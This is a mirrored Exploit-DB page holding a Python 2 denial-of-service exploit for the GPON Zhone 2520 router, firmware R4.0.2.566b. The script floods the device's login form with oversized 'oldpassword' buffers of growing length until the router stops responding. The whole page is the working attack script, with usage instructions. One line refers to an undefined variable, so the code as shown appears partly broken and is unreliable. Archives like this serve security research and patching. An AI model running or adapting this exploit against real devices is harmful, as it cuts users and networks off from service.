bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/dos/35859.py
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

40 lines
No EOL
1.6 KiB
Python
Executable file
Raw Permalink Blame History

from httplib2 import Http
from urllib import urlencode
import sys,time
#main function
if __name__ == "__main__":
if(len(sys.argv) != 2):
print '*********************************************************************************'
print ' GPON Zhone R4.0.2.566b D.O.S.'
print ' Tested on'
print ' GPON Zhone 2520'
print ' Hardware: 0040-48-02'
print ' Software: R4.0.2.566b'
print ' '
print ' Usage : python', sys.argv[0] + ' <ip>'
print ' Ex : python',sys.argv[0] + ' 192.168.15.1'
print ' Author : Kaczinski lramirez@websec.mx '
print ' URL : http://www.websec.mx/advisories'
print '*********************************************************************************'
sys.exit()
HOST = sys.argv[1]
LIMIT = 100000
COUNT = 1
SIZE = 10
BUFFER = ''
while len(BUFFER) < LIMIT:
BUFFER = '\x41' * COUNT
print "[+] Sending evil buffer with length:", len(BUFFER)
h = Http()
h.follow_redirects = True
data = dict(XWebPageName=buffer, oldpassword=BUFFER, password="", password2="test", passwdtip="test")
try:
resp, content = h.request("http://" + HOST + "/GponForm/LoginForm", "POST", urlencode(data))
except:
print "[+] GPON should be down, is not responding..."
sys.exit()
COUNT = COUNT * SIZE
print "[-] GPON not vulnerable"
Reference in a new issue View git blame Copy permalink